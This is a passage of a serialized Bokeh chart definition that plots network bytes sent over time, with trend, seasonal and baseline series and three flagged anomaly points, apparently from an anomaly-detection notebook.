63857,-101711888,-89216746,-105895710,11876868,8290842,-9141115,9767643,5072458,52651189,-31146041,30138440,11969373,47786586,-24698974,19734671,11794235,1835159,34222544,30892546,40871831,26823788,44395536,43005437,-124553748,-114080442,-87864926,-110411196,44308188,24367659,25190771,27448086,32346297,71027028,-67223086,35857241,30755471,49620926,-12212614,9561829,-1384992,-1551938,12824549,16852461,12905849,-3917770,32481668,34376414,-149890047,-166888387,-125109659,-147211007,98304113,68959521,83244911,54725681,80131020,95902952,-38334956,58193747,16332386,58312263,2163185,4537242,-7301519,6133045,-7663258,4818031,-22822832,-27042188,6413424,7613439,-176990822,-220243544,-181596448,-190243828,138628722,119976842,126114925,85115393,120349497,116566098,12282094,89144587,-24958477,68101658,23101455,-241962,-1453783,23782507,-7754703,-4315313,-42533829,-34365061,-16933805,-21086557,-197816516,-242539064,-220745227,-216917000,136056039,124798809,124818463,96248519,127886087,113775651,87499515,91334814,-28822833,74440345,35820951,-1978382,743624,34936780,-2449693,13295543,-28104788,-14972615,-13968941,-21052647,-178993018,-211793673,-192042843,-188433060,79333683,76858669,74064381,67601586,94333458,89125381,100961458,63616192,-21792728,70718169,34559259,-7594027,1920684,37529059,998249,34491411,5815245,10590334,14692497,3254207,-154143528,-165807680,-142537925,-138633962,29048381,24578569,19166124,33544440,50734917,55631125,60176944,31080566,26351370,61020191,19303838,-16575895,35728338,29263780,-5110992,43067225,37127974,25338077,45436874,37306284,-129850087,-125407572,-92678207,-94462341,2027822,-3209347,-13528429,1158114,18591289,22367988,32114398,4756476,55339399,51698435,-12494205,-18168919,90802473,999166,-12360026,27969994,37486225,25403812,43624490,42458187,-138342850,-128089522,-102024088,-111133343,31073540,28274163,13555817,20581354,27547251,29147328,39070820,16898066,56342941,52492346,-29693414,-12548111,102945427,-16000065,-11601356,3648477,16021434,15605358,19073989,28853957,-177899796,-161225454,-144578117,-158949242,79086687,69740993,58890064,60965235,64893587,54507027,67840269,43971105,64756683,56335172,-28975280,-52418,87203340,-19426322,-16177641,-17635320,-14241056,8336224,-19850038,2225159,-210164672,-200309298,-193562184,-215393260,121776547,96199842,99937063,101841632,99615584,78296973,103888245,67735847,76570609,69006639,-17825558,12628354,19777622,-23214308,-19810464,-21643644,9684442,6498366,-45639144,-16543914,-221302504,-224792096,-212350472,-234492681,132699326,92701837,112188888,105353373,117755820,82767841,111574714,65713831,65887186,73188999,-12158564,11841117,-11541624,-11486409,-25571306,-14859542,90423764,17203491,-36098808,-1272148,-196937094,-195329015,-176538235,-194435032,91336317,50634664,74468853,64485846,93256117,46164792,81468494,40440217,48206920,67752720,-16627772,8892522,1189377,-3911030,-27397975,-5887844,127862255,31318793,-3553478,24984059,-150872991,-149080506,-122539834,-137354599,49039321,6438218,30913639,18156252,56572095,17949119,37622692,23614816,38571550,52116890,-12081437,4731920,6807451,-158879,-18815022,1906049,138985933,45421684,27243396,52160181,-111567693,-108852571,-74210617,-94817971,14876710,-21997747,3972480,-5589071,27849185,10668054,8693795,27671981,38111257,29338992,-2924870,-2683138,3881496,2610186,-6865999,-3133277,70464258,32537040,32748109,58583396,-108588727,-121909647,-80973875,-104451894,32371623,2844010,24993710,18671590,39473719,27841775,26441052,54537193,56384944,27885028,18094034,-4066078,2921452,-10830840,-4867851,-16932566,1403134,-1689261,14902502,36692823,-140366517,-159714622,-127023951,-147533666,66330495,62006535,74286331,61620181,65342514,51606446,60407955,78599709,71645736,39862521,33691579,-7752063,8031274,-13686144,-9219741,-41104525,-19823475,-36318054,-9627777,9063623,-191400213,-190477028,-184801950,-193567838,89538010,117571076,124457748,99276053,86287388,59795624,90111027,97133787,75078038,55298788,43491628,-2289178,19404256,-5514895,-18252426,-57142025,-21478194,-52626649,-11648124,-18016155,-226165167,-203213250,-221146633,-215334279,94133995,137379850,142876033,108703716,78130084,53957771,96303472,95651719,81141205,70190121,45126119,12752543,31286549,11357947,-23884979,-55169057,-12417973,-29042619,12168717,-18016568,-206863623,-177547007,-201823562,-190463526,99869061,91875446,104534622,70406524,42656043,35620334,65317418,83113429,67989135,55901111,21047094,23226431,31169004,22886101,-17434703,-33582194,-895476,4373757,37562318,453525,-174349526,-152525507,-154816363,-147485134,127718903,37385268,53949776,23796572,23886528,20027257,30974855,64962866,54966000,43354095,-5512956,19720954,24842468,18782964,-5180676,492896,8034096,20045790,53003390,28988091,-133030397,-132954931,-107012826,-104661009,120862671,1536686,23026679,-12302806,22698289,14246783,7723512,49250125,48919139,44961860,-17498083,9091143,7016854,174875,2003802,14212827,9810167,-1201505,42403718,36392340,-126467368,-141725941,-107067265,-119830893,132784944,18554278,33690246,584577,48139347,35680883,15327985,59926133,52049592,59566415,-5158461,3892102,-11182962,-10954094,2422398,17200946,5647954,-32155590,16214823,24548339,-149014887,-172567438,-146454547,-160071348,114956320,58094759,71809723,38577222,77893654,56731794,41480287,77750927,66052323,83127937,19966319,2267348,-15129548,-8888320,-8051963,5016153,-5805006,-55154753,-8419098,-4873801,-177683752,-199534290,-194172502,-209988072,113432368,89147378,108819809,81201371,94839205,83916106,67612975,92585027,80892391,95203052,35643930,-1347559,-12890377,8199466,-26542496,-8763033,-8797491,-59640316,-24949039,-34068462,-199113391,-205699629,-216255013,-235312839,118163139,99963566,119393943,92909517,101583844,87827234,68474731,99603479,82378516,81576678,38794149,-3928918,5448126,30345523,-32778531,-5402631,3274929,-36030288,-13037316,-29999924,-186777711,-171098789,-181910520,-190375238,73484322,65553296,96257907,66721135,77389255,62862975,56219648,74259308,62424395,62262213,35240438,207428,-22170704,41785948,-28855516,9387204,24048237,-4981986,10269232,-13459607,-148249880,-125504736,-132398618,-133081024,27129696,22718622,62339834,34206600,49006265,49314746,42937488,45259497,45505068,51622649,22745641,5238692,-81655172,47790599,-21154691,33775494,36631426,33893670,28548204,16930625,-109031366,-91857444,-93273801,-84980834,2212028,3254061,24012113,18929131,20899780,30883044,25172166,22105317,33073585,57695977,3759971,-2757774,-81289635,36259579,-20605835,47244815,36952419,43992616,27468990,39918578,-106028816,-96660010,-95486029,-94450745,107437718,-2757351,-2466122,16433674,934339,17679347,14052530,2349877,22621044,71635030,-9694234,-9714624,-85569475,23587499,-18809802,62332046,42492595,52430217,26961919,62074117,-102145767,-98595039,-98727694,-103502399,230351733,-12103973,-34530836,11150894,-23802890,2609286,-1795627,-18677730,12892026,86297284,-26337606,-22166639,-80368737,8585259,-19207105,74131328,46599324,57277777,23032686,81888069,-103472574,-105886316,-106995251,-121193760,369293216],\"trend\":[791813560,793954323,796082001,798195962,800295629,802380022,804447972,806498433,808529739,810540272,812529410,814496941,816442716,818367460,820273144,822162345,824038229,825905278,827770492,829642744,831531345,833444945,835385711,837341820,838862017,840250670,841482884,842538643,843399287,844056247,844520874,844820001,844989495,845062805,845078093,845087195,845127911,845221372,845378739,845626996,845991471,846465805,847021819,847627283,848233322,848786611,849253558,849632012,849924258,850146061,850347778,850606108,850990385,851550897,852324683,853318616,854516750,855908915,857468818,859141556,860878634,862643408,864399711,866099499,867691369,869138857,870424458,871535026,872472981,873241000,873844279,874282699,874547193,874632652,874565408,874388684,874164793,873967413,873853079,873859554,874014444,874328729,874789620,875372797,876030820,876715592,877380088,877983354,878513451,878979207,879393402,879759908,880074777,880338038,880536497,880659117,880714932,880682281,880412864,879667868,878172871,875659111,871888025,866697016,860000181,851739201,841894000,830482534,817564803,803240507,787642126,770906763,753181350,734634681,715452075,695831407,675978050,656082183,636277979,616622211,597144688,577886977,558899999,540256534,522039743,504343936,487295632,471007841,455534676,440973020,427463444,415157438,404185348,394625915,386528264,379911678,374741265,370905595,368225292,366469694,365385989,364746772,364409079,364345411,364554286,365063438,366025592,367662842,370215981,373908012,378940603,385477444,393652391,403537641,415153803,428454940,443355405,459735165,477422740,496229601,515961834,536446498,557530876,579069984,600929345,622996471,645194928,667472133,689791803,712098230,734287187,756232110,777807312,798885044,819262655,838720936,857070377,874108370,889593307,903334387,915207172,925175987,933295307,939677593,944496630,947961925,950328520,951905610,953012182,953923725,954811587,955717789,956643223,957579170,958505534,959392450,960200562,960885757,961425804,961806741,962055116,962245896,962483965,962875153,963502718,964408857,965604635,967090224,968844634,970819609,972931576,975077281,977153220,979055758,980706895,982067900,983115576,983846216,984273409,984415503,984304170,983997752,983613076,983296088,983117555,983103422,983269671,983606730,984099302,984723220,985440603,986205102,986962146,987674881,988323494,988891968,989360060,989719429,989973595,990136896,990220115,990237674,990242150,990318854,990561501,991047716,991811532,992857399,994181415,995763124,997567404,999541050,1001622392,1003745092,1005820842,1007782754,1009587068,1011216932,1012670300,1013940319,1015038399,1015987933,1016813541,1017543198,1018218619,1018845817,1019288513,1019296261,1018562067,1016771837,1013650963,1008967917,1002564724,994351859,984313876,972504123,959007829,943972798,927642293,910249698,892006653,873105432,853732454,834071748,814292578,794537865,774908681,755440684,736126139,716953279,697939740,679154650,660697231,642691190,625262314,608552161,592726106,577970576,564492299,552491681,542101406,533378297,526301166,520806549,516805694,514147038,512625041,512004120,512024496,512428358,513029379,513775188,514672161,515785196,517298555,519465077,522573674,526903314,532701562,540149566,549335681,560254419,572783551,586722583,601929919,618279271,635633506,653859356,672815332,692371832,712403622,732788194,753426668,774262694,795257004,816377277,837587541,858824963,879980204,900907031,921423694,941329319,960406635,978445065,995269107,1010749099,1024801744,1037379906,1048439564,1057953852,1065925928,1072404133,1077497357,1081367588,1084200781,1086241632,1087762370,1089014821,1090181023,1091316687,1092440529,1093563547,1094679360,1095757181,1096766227,1097694494,1098553832,1099380624,1100217046,1101086918,1102013421,1103021531,1104113456,1105294464,1106567143,1107912516,1109295872,1110700902,1112171303,1113723298,1115316884,1116886046,1118370945,1119744421,1120988328,1122084481,1123028438,1123857154,1124618187,1125343433,1126052407,1126746111,1127422292,1128074169,1128691947,1129281021,1129844480,1130390588,1130966657,1131650647,1132462846,1133362966,1134268391,1135090746,1135776079,1136286354,1136592557,1136687959,1136582391,1136305823,1135923539,1135500394,1135100105,1134787157,1134629254,1134675391,1134952421,1135486588,1136298393,1137392193,1138765190,1140376457,1142116773,1143832372,1145446889,1146943772,1148317729,1149569543,1150696949,1151700566,1152589396,1153367329,1154021599,1154495565,1154617800,1154136745,1152777411,1150276984,1146409945,1141017112,1133987254,1125267471,1114850428,1102754733,1089040488,1073822752,1057259108,1039547690,1020893292,1001487237,981522354,961204089,940721334,920237835,899867715,879661563,859656579,839899505,820444824,801360154,782739767,764695564,747348129,730824700,715265651,700808202,687578493,675699749,665278745,656390914,649069901,643296628,638996394,636043534,634253480,633383934,633176905,633396150,633883798,634590884,635510968,636684117,638280540,640560677,643793875,648238148,654101244,661524458,670591998,681321979,693693932,707648046,723072973,739823063,757749535,776689853,796460002,816883130,837785069,859007715,880429985,901970289,923587072,945277985,967044137,988844298,1010563132,1032029275,1053046304,1073398499,1092876962,1111293042,1128469309,1144248685,1158482018,1171042682,1181856452,1190891436,1198164540,1203766980,1207861166,1210665298,1212469289,1213599560,1214380022,1215078147,1215847711,1216715425,1217670982,1218702693,1219772707,1220848172,1221912348,1222959791,1223985858,1224980625,1225951003,1226922622,1227941726,1229065370,1230353035,1231855624,1233605705,1235610638,1237845738,1240245294,1242710265,1245138105,1247423477,1249477482,1251246182,1252701379,1253817131,1254580563,1254991976,1255081247,1254907849,1254543237,1254058668,1253537880,1253061538,1252691332,1252475195,1252442906,1252598542,1252939871,1253459630,1254131406,1254919416,1255776222,1256649549,1257493249,1258259532,1258905214,1259408006,1259777276,1260018326,1260165718,1260363299,1260753080,1261425727,1262439459,1263833102,1265609451,1267731052,1270144659,1272778717,1275537105,1278317728,1281029153,1283588270,1285928420,1287998139,1289781741,1291277254,1292480578,1293406996,1294091622,1294567138,1294866863,1295015308,1294980600,1294585078,1293575779,1291677563,1288615256,1284152954,1278098183,1270313747,1260722979,1249314108,1236148027,1221344082,1205060504,1187484875,1168816986,1149272871,1129081520,1108486767,1087722217,1066989200,1046440262,1026156806,1006126141,986366650,966914116,947786324,929016143,910672127,892859552,875703123,859371236,844053950,829921163,817115403,805760111,795944875,787715759,781062379,775934102,772235279,769818374,768483898,767997605,768107550,768577249,769253756,770109017,771122015,772304997,773811331,775877709,778768229,782730906,787970114,794616988,802747603,812407279,823593965,836251461,850293968,865615351,882106339,899645100,918101949,937336068,957195796,977538226,998247870,1019244153,1040473142,1061904675,1083511886,1105249080,1127010588,1148635766,1169925889,1190676284,1210681804,1229738392,1247649346,1264233448,1279348624,1292899872,1304818683,1315061466,1323619781,1330538926,1335923660,1339939311,1342810196,1344796384,1346173352,1347190501,1348022467,1348725623,1349320591,1349818823,1350218760,1350516600,1350723666,1350853810,1350930761,1351007563,1351137857,1351373248,1351762479,1352343955,1353143994,1354173272,1355446280,1356970637,1358720817,1360645841,1362689120,1364798529,1366907333,1368939252,1370827117,1372547813,1374100179,1375485120,1376718237,1377847233,1378917879,1379967312,1381026599,1382096701,1383174736,1384265283,1385363751,1386456776,1387539643,1388630523,1389769485,1390969734,1392225565,1393503908,1394744132,1395864230,1396797905,1397502022,1397954295,1398141076,1398056620,1397716901,1397175387,1396492157,1395741522,1395005891,1394352499,1393839471,1393519032,1393416608,1393532904,1393842228,1394317196,1394901864,1395459326,1395878624,1396101371,1396121861,1395964277,1395666487,1395257210,1394759051,1394202926,1393617838,1393018234,1392386522,1391569117,1390338184,1388452181,1385667653,1381777472,1376634316,1370121501,1362141412,1352625659,1341532201,1328880054,1314757811,1299318255,1282739616,1265201618,1246875898,1227938644,1208581426,1188986776,1169308043,1149644056,1130032379,1110489225,1091019003,1071638578,1052431410,1033529444,1015101165,997334211,980404366,964478021,949726533,936339809,924523262,914375079,905917534,899126468,893919536,890158117,887660834,886197653,885487767,885250173,885247454,885333786,885496191,885739083,886141958,886649686,887397609,888364711,889501250,890762866,892113973,893526169,894976933,896447729,897923128,899390568,900839121,902260555,903648892,905000046,906311232,907581750,908812427,910005920,911166846,912301578,913418445],\"weights\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"5417\"},\"selection_policy\":{\"id\":\"5416\"}},\"id\":\"5367\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"label\":{\"value\":\"baseline\"},\"renderers\":[{\"id\":\"5437\"}]},\"id\":\"5459\",\"type\":\"LegendItem\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5419\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"source\":{\"id\":\"5367\"}},\"id\":\"5410\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5420\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#1f77b4\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5406\",\"type\":\"Circle\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5421\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5430\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"hatch_alpha\":{\"value\":0.1},\"hatch_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"5512\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5426\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"hatch_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"5511\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5425\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5422\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5423\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5424\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5429\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5427\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"5380\"}],\"center\":[{\"id\":\"5383\"},{\"id\":\"5387\"},{\"id\":\"5431\"}],\"height\":700,\"left\":[{\"id\":\"5384\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"5409\"},{\"id\":\"5437\"},{\"id\":\"5465\"}],\"title\":{\"id\":\"5370\"},\"toolbar\":{\"id\":\"5394\"},\"toolbar_location\":\"above\",\"width\":1200,\"x_range\":{\"id\":\"5372\"},\"x_scale\":{\"id\":\"5376\"},\"y_range\":{\"id\":\"5374\"},\"y_scale\":{\"id\":\"5378\"}},\"id\":\"5369\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis_label\":\"TimeGenerated\",\"coordinates\":null,\"formatter\":{\"id\":\"5401\"},\"group\":null,\"major_label_policy\":{\"id\":\"5415\"},\"ticker\":{\"id\":\"5381\"}},\"id\":\"5380\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5428\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"5517\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"5378\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"firebrick\"},\"hatch_color\":{\"value\":\"firebrick\"},\"line_color\":{\"value\":\"firebrick\"},\"marker\":{\"value\":\"circle_x\"},\"size\":{\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"5462\",\"type\":\"Scatter\"},{\"attributes\":{\"tools\":[{\"id\":\"5368\"},{\"id\":\"5388\"},{\"id\":\"5389\"},{\"id\":\"5390\"},{\"id\":\"5391\"},{\"id\":\"5392\"}]},\"id\":\"5394\",\"type\":\"Toolbar\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"AAAoMCKrdkIAAMiCeax2QgAACCgor3ZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"TotalBytesSent\":[916767394,1555286702,1768911488],\"baseline\":[655437109,1259512902,1415729535],\"index\":[299,399,599],\"level_0\":[0,1,2],\"residual\":[261330284,295773799,353181952],\"score\":{\"__ndarray__\":\"wtlpAeI6CUC88J0MSY4MQJbGSlKsDBFA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"seasonal\":[102945427,127862255,120862671],\"trend\":[552491681,1131650647,1294866863],\"weights\":[1,1,1]},\"selected\":{\"id\":\"5475\"},\"selection_policy\":{\"id\":\"5474\"}},\"id\":\"5460\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5460\"},\"glyph\":{\"id\":\"5462\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5464\"},\"nonselection_glyph\":{\"id\":\"5463\"},\"view\":{\"id\":\"5466\"}},\"id\":\"5465\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5475\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5507\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"label\":{\"value\":\"anomalies\"},\"renderers\":[{\"id\":\"5465\"}]},\"id\":\"5489\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"5460\"}},\"id\":\"5466\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5495\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"5474\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5550\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5551\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5552\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5561\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5557\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5556\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5553\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5554\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5555\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5560\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5558\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5559\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1560163860000.0,\"start\":1556237340000.0},\"id\":\"5493\",\"type\":\"Range1d\"},{\"attributes\":{\"below\":[{\"id\":\"5501\"},{\"id\":\"5506\"}],\"center\":[{\"id\":\"5504\"}],\"height\":140,\"renderers\":[{\"id\":\"5514\"}],\"title\":{\"id\":\"5491\"},\"toolbar\":{\"id\":\"5505\"},\"toolbar_location\":null,\"width\":1200,\"x_range\":{\"id\":\"5493\"},\"x_scale\":{\"id\":\"5497\"},\"y_range\":{\"id\":\"5495\"},\"y_scale\":{\"id\":\"5499\"}},\"id\":\"5490\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"Range Selector\"},\"id\":\"5491\",\"type\":\"Title\"},{\"attributes\":{\"align\":\"right\",\"coordinates\":null,\"group\":null,\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"5506\",\"type\":\"Title\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"5550\"},{\"id\":\"5551\"},{\"id\":\"5552\"},{\"id\":\"5553\"},{\"id\":\"5554\"},{\"id\":\"5555\"},{\"id\":\"5556\"},{\"id\":\"5557\"},{\"id\":\"5558\"},{\"id\":\"5559\"},{\"id\":\"5560\"},{\"id\":\"5561\"}]},\"id\":\"5502\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"5499\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5497\",\"type\":\"LinearScale\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"5507\"},\"group\":null,\"major_label_policy\":{\"id\":\"5529\"},\"ticker\":{\"id\":\"5502\"}},\"id\":\"5501\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"axis\":{\"id\":\"5501\"},\"coordinates\":null,\"group\":null,\"ticker\":null},\"id\":\"5504\",\"type\":\"Grid\"},{\"attributes\":{\"active_multi\":{\"id\":\"5516\"},\"tools\":[{\"id\":\"5516\"}]},\"id\":\"5505\",\"type\":\"Toolbar\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"AAAwpx+ndkIAABgWI6d2QgAAAIUmp3ZCAADo8ymndkIAANBiLad2QgAAuNEwp3ZCAACgQDSndkIAAIivN6d2QgAAcB47p3ZCAABYjT6ndkIAAED8Qad2QgAAKGtFp3ZCAAAQ2kindkIAAPhITKd2QgAA4LdPp3ZCAADIJlOndkIAALCVVqd2QgAAmARap3ZCAACAc12ndkIAAGjiYKd2QgAAUFFkp3ZCAAA4wGendkIAACAva6d2QgAACJ5up3ZCAADwDHKndkIAANh7dad2QgAAwOp4p3ZCAACoWXyndkIAAJDIf6d2QgAAeDeDp3ZCAABgpoandkIAAEgViqd2QgAAMISNp3ZCAAAY85CndkIAAABilKd2QgAA6NCXp3ZCAADQP5undkIAALiunqd2QgAAoB2ip3ZCAACIjKWndkIAAHD7qKd2QgAAWGqsp3ZCAABA2a+ndkIAAChIs6d2QgAAELe2p3ZCAAD4JbqndkIAAOCUvad2QgAAyAPBp3ZCAACwcsSndkIAAJjhx6d2QgAAgFDLp3ZCAABov86ndkIAAFAu0qd2QgAAOJ3Vp3ZCAAAgDNmndkIAAAh73Kd2QgAA8Onfp3ZCAADYWOOndkIAAMDH5qd2QgAAqDbqp3ZCAACQpe2ndkIAAHgU8ad2QgAAYIP0p3ZCAABI8vendkIAADBh+6d2QgAAGND+p3ZCAAAAPwKodkIAAOitBah2QgAA0BwJqHZCAAC4iwyodkIAAKD6D6h2QgAAiGkTqHZCAABw2BaodkIAAFhHGqh2QgAAQLYdqHZCAAAoJSGodkIAABCUJKh2QgAA+AIoqHZCAADgcSuodkIAAMjgLqh2QgAAsE8yqHZCAACYvjWodkIAAIAtOah2QgAAaJw8qHZCAABQC0CodkIAADh6Q6h2QgAAIOlGqHZCAAAIWEqodkIAAPDGTah2QgAA2DVRqHZCAADApFSodkIAAKgTWKh